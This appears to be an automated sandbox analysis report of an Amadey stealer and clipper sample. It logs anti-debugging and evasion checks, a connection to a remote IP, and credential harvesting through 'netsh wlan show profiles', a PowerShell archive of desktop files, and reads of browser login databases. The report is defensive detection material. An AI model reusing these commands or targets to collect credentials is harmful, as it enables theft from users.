Source: explorha.exe, explorha.exe, 00000013.00000002.3964570826.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000014.00000002.4564556028.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000015.00000002.5165839240.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000016.00000002.5764093928.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 0000001B.00000002.6364214151.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 0000001C.00000002.6965655193.00000000003FC000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D5C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(em
Source: MejqsB9tx9.exe, 00000000.00000003.2096345588.0000000000C0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D64E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MejqsB9tx9.exe, 00000000.00000002.2113367888.0000000000E7C000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000004.00000002.2202739866.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000011.00000002.2761888608.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000012.00000002.3364634958.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000013.00000002.3964570826.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000014.00000002.4564556028.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000015.00000002.5165839240.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000016.00000002.5764093928.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 0000001B.00000002.6364214151.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 0000001C.00000002.6965655193.00000000003FC000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: netsh.exe, 0000000A.00000003.2243139745.0000020C08AA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\MejqsB9tx9.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Code function: 0_2_04F00BE2 rdtsc 0_2_04F00BE2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: explorha.exe, explorha.exe, 00000013.00000002.3964570826.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000014.00000002.4564556028.00000000003FC000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000015.00000002.5165839240.00000000003FC000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\MXPXCVPDVN.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\SFPUSAFIOL.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\SQRKHNBNYN.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\UOOJJOZIRH.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\UOOJJOZIRH.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 19.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MejqsB9tx9.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.explorha.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2071968571.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.5165698407.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.6965541882.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2721575970.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160855168.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3364512617.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2113250673.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.3323961922.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2202163510.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3964432891.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2150590473.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.5723618295.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.5125435068.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.4524056257.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4564441818.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.3923895726.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2761782097.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.6323798855.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.6925313882.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.5763960735.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.6364066589.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data Jump to behavior
